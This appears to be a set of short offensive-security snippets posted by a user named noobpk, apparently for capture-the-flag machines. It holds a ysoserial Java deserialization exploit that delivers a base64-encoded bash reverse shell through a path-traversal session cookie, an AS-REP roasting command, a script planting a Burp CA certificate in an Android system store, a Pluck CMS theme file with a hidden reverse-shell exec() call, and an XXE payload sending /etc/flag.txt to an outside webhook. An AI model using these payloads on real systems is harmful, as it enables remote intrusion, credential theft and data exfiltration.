noobpk

#!/bin/bash

#bash -i >& /dev/tcp/10.10.14.169/4444 0>&1
payload="bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42OS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"
java -jar ysoserial-master.jar CommonsCollections2 "${payload}" > noob.session
curl -F '[email protected]' http://localhost/upload.jsp?email=noob@noob
curl --cookie "JSESSIONID=../../../../../opt/samples/uploads/noob" -L http://localhost/upload.jsp?email=noob@noob

noobpk

python3 GetNPUsers.py domain.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john

noobpk

#!/bin/bash

curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*

noobpk

<?php
//This is the old default theme of pluck
//Designer: Sander Thijsen, http://www.somp.nl
//You can find pluck at http://www.pluck-cms.org
exec("/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'");
$themedir = "oldstyle_exec";
$themename = "Oldstyle_exec";
$module_space[0] = "main";
$module_space[1] = "footer";
?>

noobpk

<!ENTITY % file SYSTEM "file:///etc/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'https://webhook.site/55c683be-520b-435f-ad7b-9f9b6053f7d7/?flag=%file;'>">
%all;